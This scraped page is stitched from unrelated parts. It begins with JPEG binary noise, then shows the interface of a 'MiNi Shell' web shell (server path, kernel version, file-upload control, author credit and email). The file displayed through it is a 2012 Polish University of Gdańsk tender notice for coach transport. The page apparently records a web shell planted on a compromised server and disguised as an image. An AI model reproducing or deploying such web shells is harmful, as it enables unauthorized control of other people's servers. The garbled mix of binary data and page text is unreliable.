JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120629/141517-N-2012.html

<p class="kh_header"><b>Gdańsk: Świadczenie usług przewozu autokarowego na potrzeby Uniwersytetu Gdańskiego.</b><br>
<b>Numer ogłoszenia: 141517 - 2012; data zamieszczenia: 29.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług przewozu autokarowego na potrzeby Uniwersytetu Gdańskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia.
    Przedmiotem zamówienia jest świadczenie usług autokarowego przewozu osób wg potrzeb Zamawiającego, z uwzględnieniem opcji: przewóz studentów na ćwiczenia terenowe, członków grup twórczych ACK (zespół pieśni i tańca, chór, itp.), AZS, wyjazdy organizacji  studenckich, wyjazdy pracowników. 

2. Charakterystyka wyjazdów:
1)	Przewóz studentów na ćwiczenia terenowe - najczęściej są to wyjazdy do 300 km łącznie od siedziby Zamawiającego, trwające od 4 do 10 godzin.
2)	Przewozy członków grup twórczych Akademickiego Centrum  Kultury  (zespół pieśni i tańca, chór) na koncerty, festiwale, konferencje oraz zgrupowania. Wyjazdy lokalne do 300 km z maksymalnym czasem do 8 godzin, oraz wielodniowe objazdowe z pełną dyspozycją kierowcy. Struktura wyjazdów obejmuje także przewozy na zgrupowania obozowe trwające ok. 10 dni bez potrzeby dysponowania autokarem w miejscu pobytu docelowego.
3)	Przewozy członków Akademickiego Związku Sportowego na obozy i turnieje. Wyjazdy najczęściej jedno lub dwudniowe (przejazd na miejsce docelowe, rozegranie turnieju, powrót bezpośrednio po rozgrywkach). Ponadto wyjazdy na wielodniowe (3-10 dni) obozy najczęściej z dyspozycją kierowcy na miejscu pobytu docelowego ze średnim przebiegiem dziennym ok. 50 km.
4)	Przewozy gości zagranicznych na trasie z lotniska do miejsca zakwaterowania na terenie Trójmiasta (Domy Studenckie oraz Hotele Asystenckie).
5)	Przewozy pracowników w ramach organizowanych akcji socjalnych - najczęściej wycieczki kilkudniowe.
6)	Przewóz pracowników na uroczystości okolicznościowe - najczęściej przewozy lokalne w granicach od 2 do 8 godzin.
7)	Zamawiający zastrzega, iż zamówienia będą realizowane zgodnie z bieżącymi  potrzebami     Uczelni.
8)	Zamawiający zastrzega sobie prawo do rezygnacji z części zamówienia do 20% wartości brutto zamówienia. W  tym przypadku Wykonawcy nie przysługują roszczenia odszkodowawcze wobec Zamawiającego.

3. Wymagania w stosunku do przedmiotu zamówienia:
1)	Zamawiający wymaga, aby Wykonawca dysponował następującym potencjałem technicznym niezbędnym do wykonania zamówienia:
-  autokar z ilością miejsc od 15 - 19 osób - 2 szt. (rok produkcji nie starszy niż 2000),
-  autokar z ilością miejsc od 20 - 30 osób - 1 szt. (rok produkcji nie starszy niż 2000),
-  autokary z ilością miejsc od 48 - 55 osób - 3 szt. (rok produkcji nie starszy niż 2000),
Zamawiający zastrzega możliwość zgłoszenia jednorazowo 3 autokarów o liczbie miejsc 48-55.
2)	Zamawiający wymaga, aby Wykonawca przez cały okres świadczenia usługi posiadał licencje na wykonywanie krajowego transportu drogowego. 
3)	Wykonawca zobowiązany jest zapewnić autokary:
	sprawne technicznie, posiadające sprawną klimatyzację oraz nawiew grzewczy,  w zależności od panującej temperatury, 
	wyposażone w system audio-video, barek, oraz system GPS.
	posiadające fotele regulowane przynajmniej w dwóch płaszczyznach, przyciemniane szyby lub zasłonki oraz
	posiadające toaletę, lodówkę, przestrzeń bagażową nie mniejszą niż 10m3 (dotyczy autokarów z ilością miejsc od 48-55 osób) 
4)	Wykonawca zobowiązany jest do zapewnienia niezbędnej ilości kierowców do obsługi każdego autokaru przy założeniu przestrzegania wymaganego ustawą czasu pracy kierowców.
5)	Wykonawca bierze na siebie pełną odpowiedzialność za posiadanie wszelkich niezbędnych dokumentów służących do prawidłowej realizacji przewozów:
	aktualne badania lekarskie kierowców, uprawniające do prowadzenia pojazdów, 
	ubezpieczenia OC i AC samochodów oraz NW pasażerów na poszczególne środki transportowe, 
	aktualne badania techniczne potwierdzające sprawność autokarów.
6)	Zamawiający będzie powiadamiał Wykonawcę o planowanym wyjeździe oraz miejscu podstawienia autokaru za pośrednictwem faksu lub emailem z wyprzedzeniem minimum 7 dni przed planowanym terminem wyjazdu.
7)	Każdy wyjazd fakturowany będzie osobną fakturą zawierającą niezbędne informacje do jednoznacznego określenia usługi i jej rozliczenia. Zapłata za wykonaną usługę będzie następowała w terminie 30 dni od daty wystawienia faktury. Wykonawca Zobowiązany jest każdorazowo doręczyć fakturę VAT w wersji papierowej w terminie 9 dni od daty jej wystawienia. 
8)	Należności za zrealizowany przewóz uzależnione będą od przebiegu kilometrów i czasu wynajmu pojazdów, ostatecznie wynikać będą z potwierdzonych przez Zamawiającego i Wykonawcę stanów faktycznych - protokół realizacji przewozu, którego wzór ustalony będzie w Wykonawcą po podpisaniu umowy. Protokół zawierający podpisy obu stron winien być dołączony do faktury. 
9)	Wszystkie ceny jednostkowe określone przez Wykonawcę pozostają niezmienne w okresie realizacji niniejszego zamówienia.

4. Kategorie przewozów.
1)	Zamawiający będzie zlecał przewozy w następujących wariantach:
a)  Przewozy lokalne 
b)  Przewozy krajowe 
a)	Przewozy lokalne (A) należy traktować jako przewozy z planowanym przejazdem do 300 km łącznie, licząc z miejsca podstawienia autokaru, tj. z siedziby Zamawiającego (jednostki usytuowane w Trójmieście). Jednostką rozliczeniową w tej kategorii przewozów będzie ryczałt uzależniony od typu autokaru:
	A1 - autokary z możliwością przewozu 15-19 osób, 
	A2 - autokary z możliwością przewozu 20-30 osób, 
	A3 - autokary z możliwością przewozu 48-55 osób, 
oraz od czasu pozostawania autokaru w dyspozycji Zamawiającego, tj.
	ryczałt do 2 godz. i maksymalnie 80 km przejazdu,
	ryczałt do 4 godz. i maksymalnie 150 km przejazdu,
	ryczałt do 8 godz. i maksymalnie 300 km przejazdu,
	stawka za dodatkową godzinę, doliczaną w przypadku przekroczenia ryczałtu 8 godzinnego.
b)	Przewozy krajowe (B w wariantach B1 i B2 w formularzu ofertowym Załącznik nr 2 do SIWZ) rozumiane będą jako wyjazdy planowane powyżej 300 km (liczone z miejsca podstawienia autokaru, tj. siedziby jednostek UG zlokalizowanych na terenie Trójmiasta) i rozliczane będą wg stawki za kilometr. Cena w przypadku przewozów krajowych uzależniona będzie od: 
- typu autokaru A1, A2, A3 (opis pkt. 1 powyżej);
       - długości trasy liczonej z miejsca podstawienia autokaru, tj. siedziby jednostek UG do miejsca powrotu, łącznie z całkowitym przebiegiem kilometrów w czasie całego wyjazdu, w tym w miejscu pobytu docelowego, odpowiednio w kategoriach:
do 600 km,
do 1000 km,
powyżej 1000 km.
Zgodnie z potrzebami Zamawiającego wyjazdy mogą być planowane w różnych przedziałach czasowych - od jednodniowych po kilkunastodniowe oraz zmiennym zapotrzebowaniem na dysponowanie autokarem w miejscu pobytu docelowego. Zamawiający zastrzega możliwość wystąpienia sporadycznie (maksymalnie pięciokrotnie) wyjazdów powyżej 1000 kilometrów w kategorii wyjazdów jednodniowych (wariant z tabeli B1C1) z realizacją przewozu trwającą od momentu wyjazdu z Gdańska do np. Zakopanego oraz powrotem po 2-3 godz. pobytu (bez noclegu). 
Ceny dla przedstawionych powyżej przewozów, muszą być tak skalkulowane, aby jednoznacznie obejmowały wszelkie koszty po stronie Wykonawcy, w tym:
a)	podstawienia autokaru do siedziby Zamawiającego, 
b)	koszt zaangażowania kolejnego kierowcy, 
c)	koszt pobytu w miejscu docelowym z dyspozycja autokaru (poza noclegiem i wyżywieniem podstawowym), przy założeniu, iż Zamawiający będzie zlecał dziennie w miejscu pobytu przewóz około 50 km, 
d)	koszt pobytu w miejscu docelowym przy wyjazdach wielodniowych (pow. 3 dni ) w wariancie B2 bez potrzeby korzystania z autokaru w miejscu pobytu docelowego (tj. koszt noclegu, wyżywienia oraz postoju autokaru), względnie do wyboru Wykonawcy inna dyspozycja autokaru. Zamawiający zapłaci Wykonawcy za faktycznie przejechane kilometry od siedziby Zamawiającego do miejsca pobytu oraz z miejsca pobytu do siedziby Zamawiającego,
e)	  opłaty za parkingi, przejazdy autostradami, 

2)	W przypadku wyjazdu połączonego z noclegiem, z wyłączeniem pkt. 1d.
 koszt noclegu oraz wyżywienia podstawowego kierowcy pokrywa organizator (Zamawiający), na zasadach uczestnika wyjazdu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania się przez Wykonawcę posiadaniem przewidzianych przepisami prawa uprawnień do wykonania działalności objętej niniejszym zamówieniem (zarobkowy przewóz osób w transporcie krajowym);
Zasady oceny spełniania warunków Zamawiającego:
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana  wg formuły  spełnia - nie spełnia na podstawie  dokumentów opisanych w rozdziale V  SIWZ. 
zezwolenie właściwego organu na prowadzenie działalności w zakresie opisanym w rozdziale II SIWZ (licencja na wykonywanie krajowego transportu drogowego osób w zakresie przewozu osób autobusem - na podstawie ustawy z dnia 6 września 2001r. o transporcie drogowym (tekst jednolity Dz. U. 2007r. nr 125, poz. 874 z późn. zm.);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania  się  przez Wykonawcę, wykonaniem a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem usług w  zakresie niezbędnym  do wykazania  spełniania warunku wiedzy i doświadczenia w okresie  ostatnich  trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia  działalności  jest krótszy - w tym okresie, poprzez realizację usług przewozu autokarowego o wartości  nie mniejszej niż  60.000,00 PLN brutto;
Zasady oceny spełniania warunków Zamawiającego:
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana  wg formuły  spełnia - nie spełnia na podstawie  dokumentów opisanych w rozdziale V niniejszej SIWZ. 
)    Wykaz wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  usług przewozu autokarowego osób o wartości nie mniejszej niż 60 000 PLN brutto (dopuszcza się sumowanie zleceń), z podaniem wartości usług, przedmiotu zamówienia, daty wykonania i odbiorcy, stanowiący załącznik nr 5 (do SIWZ) oraz załączenia dokumentów potwierdzających, że usługi zostały wykonane należycie,  wykaz musi być podpisany przez osoby upoważnione do reprezentowania danego Wykonawcy.
        Jeżeli Wykonawca  na potwierdzenie spełnienia  w/w warunku udziału w  postępowaniu przedstawi w wykazie wykonanych  usług  wartości wyrażone w  innej walucie  niż  PLN, Zamawiający do oceny  spełniania  warunków przeliczy  podaną  wartość po  średnim  kursie  tej  waluty w stosunku do PLN publikowanym  przez  NBP z dnia publikacji ogłoszenia o zamówieniu  w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca dysponuje lub będzie dysponował w okresie realizacji zamówienia następującym potencjałem technicznym niezbędnym do wykonania zamówienia:
-  autokarami z ilością miejsc od 15 - 19 osób - 2 szt.,
-  autokarem z ilością miejsc od 20 - 30 osób - 1 szt.,
-  autokarami z ilością miejsc od 48 - 55 osób - 3 szt.,
Zasady oceny spełniania warunków Zamawiającego:
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana  wg formuły  spełnia - nie spełnia na podstawie  dokumentów opisanych w rozdziale V niniejszej SIWZ. 
4)	wykaz środków transportowych -wypełniony i podpisany przez Wykonawcę załącznik nr 8 (do SIWZ). Autokary wyszczególnione w wykazie muszą spełniać wymogi opisane w rozdziale II pkt 3. ppkt.3).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
  spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których  
  spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oświadczenie o podwykonawcach - Wykonawca wykonujący zamówienie  wyłącznie siłami własnymi   nie dołącza do oferty załącznika nr 6 (do SIWZ).
2)	Zaakceptowany   przez  Wykonawcę  projekt  umowy - załącznik nr 7 (do SIWZ),  Wykonawca może też zastosować się do  informacji  zawartej w rozdz. XVI pkt 1.

     W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Wykonawcy 
     ci składają łącznie dokumenty, o których mowa w ppkt. 1) i 2).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotna zmiana postanowień umowy dopuszczalna  jest w następujących przypadkach:
      1)  zmiany terminu realizacji umowy  z przyczyn  leżących po stronie Zamawiającego (sytuacja ekonomiczna, zdolności płatnicze lub warunki organizacyjne czy też z przyczyn technicznych) lub zmiany te są korzystne dla Zamawiającego, 
       2)   zaistnienia siły wyższej,
       3)   zmiany obowiązujących przepisów prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pdzp.ug.edu.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2012 godzina 11:00, miejsce: ul. Bażyńskiego 1A, pokój nr 124, I piętro, 80 - 952 Gdańsk Oliwa,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com